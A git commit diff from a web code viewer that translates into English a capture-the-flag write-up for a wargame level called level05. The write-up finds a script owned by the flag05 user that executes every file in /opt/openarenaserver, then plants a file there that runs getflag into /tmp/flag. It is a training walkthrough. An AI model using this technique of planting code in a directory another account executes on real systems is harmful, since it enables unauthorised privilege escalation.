docs(lvl05): adding the english readme
This commit is contained in:
parent
f24f78ad47
commit
211fb0eb88
1 changed files with 4 additions and 3 deletions
|
|
@ -1,11 +1,12 @@
|
||||||
Lors de l'arriver sur le level05 je remarque que le dossier home et vide je decide donc faire une petite recherche de quel fichier appartient au flag05
|
When arriving on level05 I notice that the home directory is empty so I therefore decide to do a small search of which file belongs to flag05.
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
find / -user flag05 2> /dev/null
|
find / -user flag05 2> /dev/null
|
||||||
/usr/sbin/openarenaserver
|
/usr/sbin/openarenaserver
|
||||||
/rofs/usr/sbin/openarenaserver
|
/rofs/usr/sbin/openarenaserver
|
||||||
```
|
```
|
||||||
|
|
||||||
Nous n'avons pas les permissions d'executer ce fichier mais nous pouvons le lire:
|
We do not have the permissions to execute this file but we can read it:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
cat /usr/sbin/openarenaserver
|
cat /usr/sbin/openarenaserver
|
||||||
|
|
@ -17,7 +18,7 @@ for i in /opt/openarenaserver/* ; do
|
||||||
done
|
done
|
||||||
```
|
```
|
||||||
|
|
||||||
et je vais faire un petit fichier
|
And I am going to make a small file:
|
||||||
|
|
||||||
```bash
|
```bash
|
||||||
echo 'getflag > /tmp/flag' > /opt/openarenaserver/notanexploit
|
echo 'getflag > /tmp/flag' > /opt/openarenaserver/notanexploit
|
||||||
|
|
|
||||||
Loading…
Add table
Add a link
Reference in a new issue